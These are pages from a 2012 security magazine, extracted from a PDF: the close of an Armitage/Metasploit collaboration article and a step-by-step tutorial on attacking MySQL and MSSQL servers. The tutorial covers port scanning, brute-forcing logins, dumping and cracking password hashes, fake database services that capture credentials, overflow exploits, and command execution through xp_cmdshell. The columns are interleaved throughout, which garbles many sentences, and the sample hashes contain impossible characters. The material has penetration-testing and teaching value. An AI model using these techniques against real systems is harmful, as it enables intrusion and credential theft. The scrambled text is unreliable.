You may view collected hashes through View -> the modules panel and double-click it.
Credentials. For your cracking pleasure, the Ex- If you know the username, set the USERNAME
port button in this tab will export credentials in pw- variable. If youd like Metasploit to brute force the
dump format. You may also use the Crack Pass- username, select a value for USER_FILE. Dou-
words button to run John the Ripper against the ble-click the USER_FILE variable to bring up a file
hashes in the credentials database. chooser where you can select a text file containing
a list of usernames.
Pass-the-Hash Metasploit has many files related to brute forcing
When you login to a Windows host, your password in the [metasploit install]/data/wordlists directory.
is hashed and compared to a stored hash of your Set the PASS_FILE variable to a text file contain-
password. If they match, youre in. When you at- ing a list of passwords to try.
tempt to access a resource on the same Windows If youre only brute forcing one host and you have
domain, the stored hash is sent to the other host a lot of usernames/passwords to try, I recommend
and used to authenticate you. With access to these using an external tool like Hydra. Metasploit does
hashes, you can use this mechanism to take over not make several parallel connections to a single
other hosts on the same domain. This is called a host to speed up the process. This lesson can be
pass-the-hash attack. taken one step further use the right tool for each
Use Login -> psexec to attempt a pass-the-hash job.
attack against another Windows host. Click Check
all Credentials to have Armitage try all hashes and Remote Metasploit
credentials against the host. Remote Connections
The pass-the-hash attack attempts to upload a You can use Armitage to connect to an existing
file and create a service that immediately runs. Metasploit instance on another host. Working with
Only administrator users can do this. Further, your a remote Metasploit instance is similar to working
targets must be on the same active directory do- with a local instance. Some Armitage features re-
main for this attack to work. quire read and write access to local files to work.
Armitages deconfliction server adds these fea-
Using Credentials tures and makes it possible for Armitage clients to
Armitage will create a Login menu on each host use Metaspoit remotely.
with known services. Right-click a host and nav- Connecting to a remote Metasploit requires start-
igate to Login ->service. This will open a dialog ing a Metasploit RPC server and Armitages de-
where you may choose a username and password
from the credentials known to Metasploit.
Some services (e.g. telnet and ssh) will give you
a session when a login succeeds. Others will not.
Check the Try all credentials option and
Metasploit will login to the service with each of the
known credentials. Metasploit automatically adds
each successful login to the credentials table for
The best way into a network is through valid cre- Figure 13. Your usage of Metasploit with Metasploit RPC
dentials. Remember that a successful username/ server and Armitages deconfliction server

54 09/2012
confliction server. With these two servers set up, Multi-Player Metasploit
your use of Metasploit will look like this diagram: Armitages red team collaboration mode adds a
Figure 13. few new features. These are described here:
View -> Event Log opens a shared event log.
Multi-Player Metasploit Setup You may type into this log and communicate as
The Armitage Linux package comes with a team- if youre using an IRC chat room. In a penetration
server script that you may use to start Metasploits test this event log will help you reconstruct major
RPC daemon and Armitages deconfliction server events (Figure 14).
with one command. To run it: Multiple users may use any Meterpreter ses-
sion at the same time. Each user may open one
cd /path/to/metasploit/msf3/data/armitage or more command shells, browse files, and take
./teamserver [external IP address] [password] screenshots of the compromised host.
Metasploit shell sessions are automatically
This script assumes armitage.jar is in the cur- locked and unlocked when in use. If another user
rent folder. Make sure the external IP address is is interacting with a shell, Armitage will warn you
correct (Armitage doesnt check it) and that your that its in use.
team can reach port 55553 on your attack host. Some Metasploit modules require you to spec-
Thats it. ify one or more files. If a file option has a + next
Metasploits RPC daemon and the Armitage de- to it, then you may double-click that option name
confliction server are not GUI programs. You may to choose a local file to use. Armitage will upload
run these over SSH. the chosen local file and set the option to its re-
The Armitage team server communicates over mote location for you. Generally, Armitage will do
SSL. When you start the team server, it will pres- its best to move files between you and the shared
ent a server fingerprint. This is a SHA-1 hash of the Metasploit server to create the illusion that youre
servers SSL certificate. When your team members using Metasploit locally.
connect, Armitage will present the hash of the cer- Penetration testers will find this feature invalu-
tificate the server presented to them. They should able. Imagine youre working on a pen test and
verify that these hashes match. come across a system you dont know much
Do not connect to when a teamserv- about. You can reach back to your company and
er is running. Armitage uses the IP address youre ask your local expert to load Armitage and con-
connecting to determine whether it should use SSL nect to the same Metasploit instance. They will
(teamserver, remote address) or non-SSL (msfr- immediately have access to your scan data and
pcd, localhost). You may connect Armitage to your they can interact with your existing sessions...
teamserver locally, use the [external IP address] in seamlessly.
the Host field. Or, imagine that youre simulating a phishing at-
Armitages red team collaboration setup is CPU tack and you get access to a host. Your whole
sensitive and it likes RAM. Make sure you have team can now work on the same host. One per-
1.5GB of RAM in your team server. son can search for data, another can set up a piv-

Figure 14. The event log

www.hakin9.org/en 55
ot and search for internal hosts to attack, and an-
other can work on persistence. The sky is the limit Resources
here. Cortana is a full featured environment for developing
red team bots and extending Armitage. If youd like to
Some meterpreter commands may have short- learn more, take a look at the following resources:
ened output. Multi-player Armitage takes the initial
output from a command and delivers it to the cli- Cortana Tutorial for Scripters
ent that sent the command. Additional output is ig- Public Cortana Script Repository
Sleep Manual
nored (although the command still executes nor-
mally). This limitation primarily affects long running
meterpreter scripts. If you want to connect multiple users to
Metasploit, you have to start a team server.
Scripting Armitage Next, you will need to create a connect.prop file
Cortana to tell Cortana how to connect to the team server
Armitage includes Cortana, a scripting technolo- you started. Heres an example connect.prop file:
gy developed through DARPAs Cyber Fast Track
program. With Cortana, you may write red team host= port=55553 user=msf pass=password
bots and extend Armitage with new features. You nick=MyBot
may also make use of scripts written by others.
Cortana is based on Sleep, an extensible Perl- Now, to launch your bot:
like language. Cortana scripts have a .cna suffix.
Read the Cortana Tutorial to learn more about cd /path/to/metasploit/msf3/data/armitage
how to develop bots and extend Armitage (Figure java -jar cortana.jar connect.prop helloworld.cna
Script Management
Stand-alone Bots You dont have to run Cortana bots stand-alone.
A stand-alone version of Cortana is distributed with You may load any bot into Armitage directly. When
Armitage. You may connect the stand-alone Cor- you load a bot into Armitage, you do not need to
tana interpreter to an Armitage team server. start a teamserver. Armitage is able to deconflict its
actions from any loaded bots on its own.
Heres a helloworld.cna Cortana script: You may also use Cortana scripts to extend Ar-
on ready { println(Hello World!); quit(); } mitage and add new features to it. Cortana scripts
may define keyboard shortcuts, insert menus into
To run this script, you will need to start Corta- Armitage, and create simple user interfaces.
na. First, stand-alone Cortana must connect to a To load a script into Armitage, go to Armitage
team server. The team server is required because -> Scripts. Press Load and choose the script you
Cortana bots are another red team member. would like to load. Scripts loaded in this way will be
available each time Armitage starts.
Output generated by bots and Cortana com-
mands are available in the Cortana console. Go to
View -> Script Console.

Michael Boman
Michael Boman is a penetration tester by
day and a malware researcher by night.
Michael has more than 10 years experi-
ence in security testing of applications
and infrastructure. He also deliver cours-
es in security testing and secure develop-
ment. Michael is passionate about computer security
and doing his best so that more people do it right from
start. You can find him at his website http://michaelbo-
man.org where he tries to share his experiences when-
Figure 15. The Cortana Tutorial ever he can.

56 09/2012

How to use Sqlploit

Databases nowdays are everywhere, from the smallest desktop
applications to the largest web sites such as Facebook. Critical
business information are stored in database servers that are often
poorly secured.

omeone an to this information could have code is available under the terms of the GNU Gen-
control over a companys or an organiza- eral Public License and other proprietary license
tions infrastructure. He could even sell this agreements. MySQL is the first database choice
information to a companys competitors. Imagine when it comes to open source applications cre-
the damage that something like this could cause. In ation. MySQL is a very secure database system,
this article, we will see how we can use Metasploit but as with any software that is publicly accessible,
to attack our database servers. you cant take anything for granted.
Metasploit is a very powerful tool. Actually, is
not just a tool, it is a collection of tools. It is a Discover open MySQL ports
whole framework. It has gained incredible popu- MySQL is running by default on port 3306. To dis-
larity in the last few years because of its success cover MySQL you can do it either with nmap or
in the fields of penetration testing and informa- with Metasploits auxiliary modules.
tion security. It includes various tools, from vari-
ous scanners to exploits. It can be used to dis- The NMAP way
cover software vulnerabilities and exploit them. Nmap is a free and open source network discovery
With database servers having so many security and security auditing utility. It can discover open
weaknesses, Metasploit has numerous auxilia- ports, running services, operating system version
ry modules and exploits to assist you with your and much more. To discover open MySQL ports
database server penetration testing. Metasploit we use it in this way:
is available for all popular operating systems
so what operating system you are already us- nmap -sT -sV -Pn -p 3306
ing might not be a problem. In this article we are
going to use Metasploits auxiliary modules and
exploits to complete various penetration testing
tasks against popular database servers, such as
Microsoft SQL Server and MySQL. I hope you en-
joy it!

Attacking a MySQL Database Server

MySQL is the worlds most used open source re-
lational database management system. Its source Figure 1. Discovering MySQL servers The nmap way

58 09/2012
Parameters: To see a list of available options (Figure 3).
Set the RHOSTS parameter:
-sT: TCP connect scan
-sV: Determine Service version information set RHOSTS
-Pn: Ignore Host discovery
-p 3306: Scan port 3306 or

Scanning the whole network: set RHOSTS

nmap -sT -sV -Pn -open -p 3306 Set the RPORT parameter to a different value if
you believe that the MySQL Server is listening on
Parameters: a different port:

--open: Show only open ports (Figure 2) Set RPORT 3333

The Metasploit way Increase THREADS value for a faster scanning

Metasploit offers auxiliary module mysql_version. (Figure 4):
This module enumerates the version of running
MySQL servers. To use it type: set THREADS 50

use auxiliary/scanner/mysql/mysql_version Now, all you have to type is:

To use this scanner you have to set its options. Type: run

show options and hit enter (Figure 5).

As you can see from the screenshot we have a

MySQL version 5.0.51a running at!

Brute forcing MySQL

There is an auxiliary module in Metasploit
called mysql_login which will happily que-
ry a mysql server for specific usernames and
passwords. The options for this module are:
Figure 6.
Figure 2. Discovering MySQL servers The nmap way

Figure 5. mysql_version scanner in action

Figure 3. mysql_version auxiliary module options

Figure 4. mysql_version options after setting them up Figure 6. mysql_login module options

www.hakin9.org/en 59
To start your attack you have to set the RHOSTS download it from here http://sourceforge.net/proj-
option and choose a username and a password. ects/crunch-wordlist/.
./crunch 6 8 abcde123456 -o passfile.lst
The above command will create passwords be-
Leave the password blank. Your options, after ex- tween 6 and 8 characters long, consisting of ascii
ecuting the commands above, should seem like characters a,b,c,d,e and numbers 1,2,3,4,5,6 and
Figure 6. mysql _ login will try to login with blank will save the list into file passfile.lst (Figure 8).
password and with the username as the pass-
word. Maybe we are lucky before we start brute- Using password lists
forcing database with passwords lists (Figure 7). Now that we have our password list stored in /
We were lucky! The administrator is completely pentest/passwords/crunch/passfile.lst, we can
ignorant. But what if we weren't so lucky? We then use it in mysql_login module.
need a password list file. We can create one by
ourselves or download one from the Internet. Let's Set PASS_FILE /pentest/passwords/crunch/passfile.lst
create one!
Increase also the number of concurrent threads
Creating a password list for a faster brute-force attack.
To create our password list we are going to use
crunch. If you are using BackTrack, crunch is al- SET THREADS 50
ready installed. Open Privilege Escalation > Pass- run
word Attacks > Offline Attacks > crunch. Otherwise
mysql _ login (Figure 9) module offers 2 other op-
tions, USER _ FILE and USERPASS _ FILE. You can use
a username file list to try various username values
by setting the USER _ FILE option accordingly. With
USERPASS _ FILE parameter you can use a file which
contains both usernames and passwords in the
same file separated by space and one pair per line.

Bypass MySQL Authentication

Module mysql_authbypass_hashdump exploits a
Figure 7. Starting brute-forcing database with passwords lists
password bypass vulnerability in MySQL and

Figure 8. Generating a password list with crunch Figure 10. Running mysql_authbypass_hashdump module

Figure 9. mysql brute-force attack using password list Figure 11. mysql server hashes and usernames

60 09/2012
can extract usernames and encrypted passwords Unix, Windows, DOS, BeOS, and OpenVMS. Its
hashes from a MySQL server. To select it type: primary purpose is to detect weak Unix passwords.
After having acquired mysql hashes with mysql_
use auxiliary/scanner/mysql/mysql_hashdump hashdump module, load jtr_mysql_fast module
and run it.

Set RHOSTS and THREADS option: use auxiliary/analyze/jtr_mysql_fast

set THREADS 50 This module offers options such as setting a cus-
tom path for john the ripper. The option that in-
and run the module. We can also set parameter terests you the most is the Wordlist option, which
username. is a path to your desired password list (Figure
set username root
Getting the schema
Unlucky! (Figure 10) A database schema describes in a formal language
the structure of the database, the organization of
Dump MySQL Password Hashes the data, how the tables, their fields and relation-
mysql_hashdump extracts the usernames and en- ships between them must be defined and more.
crypted password hashes from a MySQL serv- In general, database schema defines the way the
er. One can then use jtr_mysql_fast module to database should be constructed. Metasploit has
crack them. The module is located in auxiliary/ the module mysql_schemadump to get MySQL sche-
scanner/mysql. To use it set RHOSTS option to ma. mysql_schemadump is located under auxiliary/
our targets IP address and increase THREADS scanner/mysql. To use it you have to set RHOSTS,
value. If you have managed to reveal root pass- USERNAME and PASSWORD options. If you are
word then set also options USERNAME and scanning more than one hosts increase THREADS
PASSWORD. Run the module to get your pre- value!
cious results! (Figure 11)
Lets go Phishing
Cracking passwords with John The Ripper Phishing is an attempt to steal sensitive infor-
Metasploit offers module jtr_mysql_fast.This mation by impersonating a well known organiza-
module uses John the Ripper to identify weak tion. In the same manner you can trick a user to
passwords that have been acquired from the steal her MySQL credentials. One of the abilities
mysql_hashdump module. John the Ripper is a of Metasploit is this, mimic known services and
free and Open Source software password crack- capture user credentials. Among the various cap-
er, available for many operating systems such as ture modules there is a module called mysql. This
module provides a fake MySQL service that is de-
signed to capture MySQL server authentication
credentials. It captures challenge and response
pairs that can be supplied to Cain or John the Rip-
per for cracking.
To select the capture module type:

use auxiliary/server/capture/mysql

Figure 12. jtr_mysql_fast module options This module offers some interesting options.
You can set CAINPWFILE option to store cap-
tured hashes in Cain&Abel format or JOHNPW-
FILE to store hashes in John The Ripper format.
Leave SRVHOST option as it is,, to listen
on the local host. You can also set the SRVVER-
SION option, which is the version of the mysql
server that will be reported to clients in the greet-
Figure 13. mysql capture module options ing response. This option must agree with the true

www.hakin9.org/en 61
mysql server version on the network if you dont MySQL Exploiting
want to being detected. You can also configure MySQL database system is a very secure piece
the module to use SSL! (Figure 13) of software. Metasploit doesnt offer many MySQL
Run the module and connect to the capture mysql exploits. Although some exploits exist.
server from another computer on the network to
see how it is working. To connect to a mysql server YaSSL Exploits
open a terminal and type: YaSSL is a lightweight embedded SSL library.
Metasploit offers 2 exploits for this library. The
mysql -h ip_address -u root -p mysql_yassl_getname and the mysql_yassl_hello.
The mysql_yassl_getname exploits a stack buffer
Enter any password, for now, in mysqls prompt overflow in the yaSSL 1.9.8 and earlier and mysql_
and see what is happening in Metasploit! (Figure yassl_hello exploits a stack buffer overflow in the
14) yaSSL 1.7.5 and earlier. To use any exploit you
Metasploit has captured the hash and now this have to select it:
hash is stored in cain and john format in files /tmp/
john and /tmp/cain. These are the files that I have use exploit/linux/mysql/mysql_yassl_getname
chosen. use exploit/linux/mysql/mysql_yassl_hello
use exploit/windows/mysql/mysql_yassl_hello
Cain Format
root NULL As you can figure, the last exploit is for windows
94e243cab3181cvef73852s3011651369196a928 systems. After selecting your desired exploit,
112263447569708899agbbfcddneff2113434455 SHA1 you have to select the payload. Each exploit of-
fers a variety of payloads. You have to choose
John format the most suitable for your target. To see a list
root:$mysqlna$1112263447569708899agbb of available payloads for the exploit type (Fig-
fcddneff2113434455 * ure 15):
show payloads

The most successful exploits usually are the

reverse _ tcp payloads where the target machine
connects back to you. Each payload offers some
options. By typing

show options
Figure 14. mysql capture module in action
you will see exploits and payloads options (Fig-
ure 16).

Other MySQL Exploits

We should mention here two more exploits that are
available for MySQL systems that run on Windows
servers. The mysql_payload and the scrutinizer_
upload_exec. The first exploit, mysql_payload, cre-
Figure 15. Exploits and payloads options
ates and enables a custom UDF on the target. On
default Microsoft Windows installations of MySQL
5.5.9 and earlier, directory write permissions are
not enforced, and the MySQL service runs as Lo-
calSystem. This module will leave a payload ex-
ecutable on the target system and the UDF DLL,
and will define or redefine sys_eval() and sys_
exec() functions. The scrutinizer_upload_exec
module exploits an insecure config found in Scru-
tinizer NetFlow & sFlow Analyzer, a network traffic
Figure 16. mysql_yassl_hello exploit payloads monitoring and analysis tool. By default, the soft-

62 09/2012
ware installs a default password in MySQL, and store, retrieve and manage information. As with
binds the service to This allows any re- many Microsofts products, SQL Server has many
mote user to login to MySQL, and then gain arbi- security weaknesses. Lets start by identifying run-
trary remote code execution under the context of ning SQL servers on the network.
Discover open MSSQL ports
We are in! MSSQL is running by default on port 1433. To dis-
And now what? Metasploit offers two modules cover SQL Server you can use either nmap or
that will assist you to enumerate a MySQL ser- Metasploits auxiliary module.
vice or execute sql queries. All you need is a val-
id user-password pair. mysql_enum allows for sim- The NMAP way
ple enumeration of MySQL Database Server and To discover open MSSQL ports we execute the fol-
mysql_sql allows for simple SQL statements to lowing command:
be executed against a MySQL instance. To select
them, type: nmap -sT -sV -Pn -p 1433

use auxiliary/admin/mysql/mysql_enum Usually administrators, when they need more than

one instances of SQL server they run the second
and execute the command instance at port 1434.

show options nmap -sT -sV -Pn -p 1433,1434

to get a list of available options (Figure 17). Parameters:

To use mysql_sql execute (Figure 18):
-sT: TCP connect scan
use auxiliary/admin/mysql/mysql_sql -sV: Determine Service version information
-Pn: Ignore Host discovery
and -p 1433,1434: Scan port 1433 and 1434

show options Scanning the whole network

Attacking a Microsoft SQL Server nmap -sT -sV -Pn -open -p 1433,1434
Microsoft SQL Server (MSSQL) is a relational da-
tabase management system (RDBMS) used to Parameters:

Figure 17. mysql_enum module options Figure 19. mssql_ping module options

Figure 18. mysql_sql module options Figure 20. mssql_ping module in action

www.hakin9.org/en 63
--open: Show only open ports list file, like we did in the first chapter where we
used mysql_login module.
The Metasploit way
Metasploit offers auxiliary module mssql_ping. Dump MSSQL Password Hashes
This module discovers running MSSQL services. mssql_hashdump extracts the usernames and en-
To use it, type: crypted password hashes from a MSSQL server
and stores them for later cracking with jtr_mssql_
use auxiliary/scanner/mssql/mssql_ping fast. This module also saves information about
the server version and table names, which can be
Type: used to seed the wordlist. The module is located
in auxiliary/scanner/mssql. To use it set RHOSTS
show options option to our targets ip address and increase
THREADS value to 50. If you have managed to
for a list of available options (Figure 19). reveal root password then set also options USER-
To discover all running MSSQL services on the NAME and PASSWORD. Run the module! (Figure
net, set RHOSTS value equal to, 22).
assuming that your target network is in this range,
increase threads value for a faster scanning and Cracking mssql passwords with John The
run the module (Figure 20). Ripper
Metasploit offers module jtr_mssql_fast. This
Brute forcing MSSQL module works in the same manner as jtr_mysql_
Auxiliary module mssql_login is working in the fast does. It uses John the Ripper to identify
same manner as mysql_login does. It will query weak passwords that have been acquired from the
the MSSQL instance for a specific username and mssql_hashdump module. After having acquire ms-
password pair. The options for this module are: sql encrypted hashes with mssql_hashdump mod-
Figure 21. ule, load jtr_mssql_fast and run it.
The default administrator's username for SQL
server is sa. In the options of this module, you use auxiliary/analyze/jtr_mssql_fast
can specify a specific password, or a password
list, a username list or a username-password list and
where usernames and passwords are separated
by space and each pair is in a new line. Having set run
your options simply run the module and wait for
your results! You can create your own password You should set the Wordlist option which is the
path to your desired password list (Figure 23).

Getting Microsoft SQL Server schema

Metasploit offers the module mssql_schemadump
to retrieve MSSQL schema. mssql_schemadump
is located under auxiliary/scanner/mssql. This
module attempts to extract the schema from a
MSSQL Server Instance. It will disregard builtin
and example DBs such as master,model,msdb,
and tempdb. The module will create a note for
Figure 21. mssql_login options

Figure 22. mssql_hashdump module Figure 23. jtr_mssql_fast module options

64 09/2012
each DB found, and store a YAML formatted out- SQL Server 2000
put as loot for easy reading.To use it you have to SQL server 2000 is a very old version of Micro-
set RHOSTS, USERNAME and PASSWORD op- soft SQL Server and is hard to find it on Produc-
tions. If you are scanning more than one hosts in- tion environments nowdays. ms02_039_slammer
crease the THREADS value to get results faster. exploits a resolution service buffer overflow. This
overflow is triggered by sending a udp packet to
Phishing with MSSQL port 1434 which starts with 0x04 and is followed by
Metasploit has also a mssql capture module, called long string terminating with a colon and a number.
mssql. This module provides a fake MSSQL service To select it for use simply type:
that is designed to capture MSSQL server authen-
tication credentials. The module supports both the use exploit/windows/mssql/ms02_039_slammer
weak encoded database logins as well as Windows
login (NTLM). To select the capture module type: Another exploit module for SQL Server 2000 is
ms02 _ 056 _ hello. ms02 _ 056 _ hello is an exploit
use auxiliary/server/capture/mssql which will send malformed data to TCP port 1433
to overflow a buffer and possibly execute code on
You can set CAINPWFILE option to store cap- the server with SYSTEM level privileges. To se-
tured hashes in Cain&Abel format or JOHNPW- lect it, type:
FILE to store hashes in John The Ripper format.
Leave SRVHOST option as it is,, to listen use exploit/windows/mssql/ms02_056_hello
on the local host. You can configure the module
to use SSL (Figure 24). SQL Server 2000 SQL Server 2005
Run the module and connect to the capture ms- ms09_004_sp_replwritetovarbin and ms09_004_
sql server from another computer on the network sp_replwritetovarbin_sqli exploit a heap-based
to see how it is working. To connect to a mssql buffer overflow that occur when calling the undoc-
server open your Microsoft SQL Server manage- umented sp_replwritetovarbin extended stored
ment studio and try to login to the running service procedure. This vulnerability affects all versions of
(Figure 25). Metasploit has captured the username Microsoft SQL Server 2000 and 2005, Windows
and the password the user entered to login to the Internal Database, and Microsoft Desktop Engine
fake MSSQL service. without the updates supplied in MS09-004. Micro-
soft patched this vulnerability in SP3 for 2005. To
Exploiting the Microsoft world use these exploits you type:
Metasploit offers some MSSQL exploits. Lets take
a look. use exploit/windows/mssql/ms09_004_sp_


use exploit/windows/mssql/ms09_004_sp_

As with any Metasploit module, you can type

show options
Figure 24. mssql capture module options

Figure 26. ms09_004_sp_replwritetovarbin_sqli module

Figure 25. Login attempt captured by mssql capture module options

www.hakin9.org/en 65
to get a list of available options (Figure 26). From inside
Type Metasploit offers various modules that will assist
you to enumerate a MSSQL service, execute sql
show payloads queries, retrieve useful data and many more. All
you need is a valid user-password pair. mssql_enum
to get a list of available of payloads for the select- will perform a series of configuration audits and se-
ed exploit. curity checks against a Microsoft SQL Server data-
base. mssql_sql and mssql_sql_file will allow for
SQL Server database systems simple SQL statements to be executed against a
Metasploit offers the module, exploit/windows/ MSSQL/MSDE or multiple SQL queries contained
mssql/mssql_payload, which executes an arbitrary within a specified file. To select them, type:
payload on a Microsoft SQL Server by using the
xp_cmdshell stored procedure. Three delivery use auxiliary/admin/mssql/mssql_enum
methods are supported. The original method uses
Windows debug.com. Since this method invokes or
ntvdm, it is not available on x86_64 systems. A
second method takes advantage of the Command use auxiliary/admin/mssql/mssql_sql
Stager subsystem. This allows using various tech-
niques, such as using a TFTP server, to send the or
executable. By default the Command Stager uses
wcsript.exe to generate the executable on the tar- use auxiliary/admin/mssql/mssql_sql_file
get. Finally, ReL1Ks latest method utilizes Power-
Shell to transmit and recreate the payload on the and execute the following command to see the
target. options (Figure 27)
Another interesting exploit module that can be
applied in all SQL Server versions is the exploit/ show options
windows/mssql/mssql_payload_sqli. This module
will execute an arbitrary payload on a Microsoft Sample Data
SQL Server, using a SQL injection vulnerability. There is an amazing module called mssql_
Once a vulnerability is identified this module will findandsampledata. This module will search
use xp_cmdshell to upload and execute Metasploit through all of the non-default databases on the
payloads. It is necessary to specify the exact point SQL Server for columns that match the keywords
where the SQL injection vulnerability happens. You defined in the TSQL KEYWORDS option. If col-
should use a reverse payload on port 80 or to any umn names are found that match the defined key-
other outbound port allowed on the firewall. words and data is present in the associated tables,
the module will select a sample of the records from
each of the affected tables. You have to set the the
sample size by configuring the SAMPLE_SIZE option.
Your results will be stored in CSV format. Type

use auxiliary/admin/mssql/mssql_findandsampledata


Figure 27. mssql_sql_file module options show options

Figure 28. mssql_findandsampledata module options Figure 29. mssql_idf module options

66 09/2012
Executing Windows Commands to compromise a database system. Databases are
If you have managed to find a valid username software that must be accessed by applications
password pair, the most desired thing that you running on the Internet, thats why they must be
would like to do is to execute a command on the guarded by firewalls, use encryption and power-
compromised machine. Metasploit offers module full passwords and the whole system (database
auxiliary/admin/mssql/mssql_exec which will ex- and operating system) must be checked every day
ecute a Windows command on a MSSQL/MSDE for new updates and upgrades. The best choice
instance via the xp_cmdshell procedure. All you would be to allow access to your database only
need is the username and password!! from your intranet and/or vpn. Try not to expose
your database directly to the web. Close all your
Data mining database system ports now!
If you need to search for specific information in
SQL Server databases there is a module that can
make your life easier. Its name, mssql_idf, and George Karpouzas
you will find it under auxiliary/admin/mssql/. This George Karpouzas is the co-found-
module will search the specified MSSQL server er and owner of WEBNETSOFT, a
for interesting columns and data. The module is Software development, Computers
working against SQL Server 2005 and SQL Server security and IT services company in
2008 (Figure 29). Greece. He is working as a software
developer for the past seven years.
Conclusion He is a penetration tester, securi-
Databases are the most important part of todays ty researcher, information security
computing systems. They usually contain all the consultant and software developer at WEBNETSOFT. He
information needed to run a company or organi- holds a bachelors of science in computer science from
zation. Therefore it is necessary to be as safe as Athens University of Economics and Business. You can
possible. Metasploit framework is just one tool of find the answers to any security questions on his blog
many out there, that offers the appropriate scripts http:// securityblog.gr.

a d v e r t i s e m e n t


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